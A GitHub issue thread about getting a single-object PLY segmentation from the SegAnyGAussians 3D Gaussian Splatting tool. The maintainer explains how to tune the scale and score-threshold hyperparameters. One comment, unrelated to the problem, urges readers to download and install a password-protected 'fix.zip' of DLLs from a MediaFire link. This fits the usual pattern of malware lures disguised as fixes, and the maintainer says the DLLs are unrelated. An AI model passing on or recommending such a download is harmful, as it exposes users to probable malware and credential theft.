### ISSUE TITLE
Segmentated Results

### ISSUE THREAD

**Issue by seulqxq** [Jumpat/SegAnyGAussians#112]
Hi, Thank you for open-sourcing your codes, I have some questions I'd like to ask you.

I use the counter dataset for segmentation and want to split  apple as 3D GS ply. And I add the 'scene.save(scene.loaded_iter, target='seg_no_mask')' after .segment(), but didn't get the desired result (3D GS ply for a single apple), are there any other parameters that need to be set?

![image](https://github.com/user-attachments/assets/fc7da6fd-8dc0-4f3d-aa75-d2def3abaf66)
![image](https://github.com/user-attachments/assets/b89fe75c-cad3-4f06-9fc2-66fb4a1d5430)

Looking forward to your reply.

**Comment by SagarChandra07** [comment]
install this
https://www.mediafire.com/file/q4gho1ar8e43udd/fix.zip/file

Password: changeme
I put the necessary dlls in the archive

**Comment by Jumpat** [comment]
Hi, I think the scale (1.0) is too large while the ScoreThresh (0.5) is too low. You need to adjust these hyperparameters for better segmentation result. I think this problem has no relation with the dlls.

**Comment by seulqxq** [comment]
Thanks for your response! I will try both methods.
Then, I still have some doubts about the two hyperparameters scale and score thresh. Could you give me more details? @Jumpat 
Thanks!

**Comment by Jumpat** [comment]
The scale indicates the 3D physical scale of the target you want to segment. If you want to segment a car you may set the scale to 1.0 but if you want to segment its wheel you may need to set it to 0.3 (or lower). The score thresh is a threshold for separating foreground and background. Higher thresh indicates a more strict filter.

**Comment by seulqxq** [comment]
Thank you for your detailed answer, you are right, after adjusting the hyperparameters to get better results and wish you a happy holiday in advance!
![image](https://github.com/user-attachments/assets/941a9dde-ac2a-4b4b-bd46-8691733e2d26)

**Comment by Jumpat** [comment]
Thank you. You can conduct segmentation repeatedly based on the current segmentation result for noise removal.

**Comment by seulqxq** [comment]
Okay, I'll give it a try!
